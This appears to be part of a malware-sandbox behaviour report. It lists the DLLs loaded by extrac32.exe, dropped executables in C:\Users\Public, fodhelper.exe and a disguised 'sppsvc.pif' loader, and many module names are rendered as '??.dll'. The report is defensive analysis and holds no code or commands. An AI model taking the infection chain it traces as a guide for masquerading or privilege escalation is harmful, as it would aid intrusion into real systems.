                    Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\Public\xkn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: twinui.appcore.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: mrmcorer.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.ui.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: windowmanagementapi.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: inputhost.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeSection loaded: bcp47mrm.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: systemsettingsthresholdadminflowui.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: newdev.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: dismapi.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: timesync.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: winbrand.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: dismapi.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: wincorlib.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: devrtl.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: settingshandlers_nt.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: errordetailscore.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\SystemSettingsAdminFlows.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: certcli.dll
                    Source: C:\Users\Public\kn.exeSection loaded: cabinet.dll
                    Source: C:\Users\Public\kn.exeSection loaded: cryptui.dll
                    Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dll
                    Source: C:\Users\Public\kn.exeSection loaded: netapi32.dll
                    Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dll
                    Source: C:\Users\Public\kn.exeSection loaded: version.dll
                    Source: C:\Users\Public\kn.exeSection loaded: secur32.dll
                    Source: C:\Users\Public\kn.exeSection loaded: certca.dll
                    Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dll
                    Source: C:\Users\Public\kn.exeSection loaded: samcli.dll
                    Source: C:\Users\Public\kn.exeSection loaded: logoncli.dll
                    Source: C:\Users\Public\kn.exeSection loaded: dsrole.dll
                    Source: C:\Users\Public\kn.exeSection loaded: netutils.dll
                    Source: C:\Users\Public\kn.exeSection loaded: sspicli.dll
                    Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dll
                    Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dll
                    Source: C:\Users\Public\kn.exeSection loaded: profapi.dll
                    Source: C:\Users\Public\kn.exeSection loaded: certcli.dll
                    Source: C:\Users\Public\kn.exeSection loaded: cabinet.dll
                    Source: C:\Users\Public\kn.exeSection loaded: cryptui.dll
                    Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dll
                    Source: C:\Users\Public\kn.exeSection loaded: netapi32.dll
                    Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dll
                    Source: C:\Users\Public\kn.exeSection loaded: version.dll
                    Source: C:\Users\Public\kn.exeSection loaded: certca.dll
                    Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dll
                    Source: C:\Users\Public\kn.exeSection loaded: secur32.dll
                    Source: C:\Users\Public\kn.exeSection loaded: samcli.dll
                    Source: C:\Users\Public\kn.exeSection loaded: logoncli.dll
                    Source: C:\Users\Public\kn.exeSection loaded: dsrole.dll
                    Source: C:\Users\Public\kn.exeSection loaded: netutils.dll
                    Source: C:\Users\Public\kn.exeSection loaded: sspicli.dll
                    Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dll
                    Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: apphelp.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: version.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: uxtheme.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: archiveint.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: cryptsp.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: url.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ieframe.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: iertutil.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: netapi32.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: userenv.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: winhttp.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: wkscli.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: netutils.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: mapi32.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: kernel.appcore.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: smartscreenps.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: kernel.appcore.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: amsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: winmm.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: wininet.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: sspicli.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: windows.storage.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: wldp.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: profapi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: kernel.appcore.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ???y.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ???y.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ???y.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ????.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ????.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ????.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ???2.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ???2.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ???2.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ???.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ???.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ???.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??????s.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??????s.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??????s.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: mswsock.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: iphlpapi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: winnsi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: dnsapi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: rasadhlp.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: fwpuclnt.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: winhttpcom.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: webio.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: schannel.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: mskeyprotect.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ntasn1.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ncrypt.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ncryptsslp.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: msasn1.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: cryptsp.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: rsaenh.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: cryptbase.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: gpapi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: dpapi.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
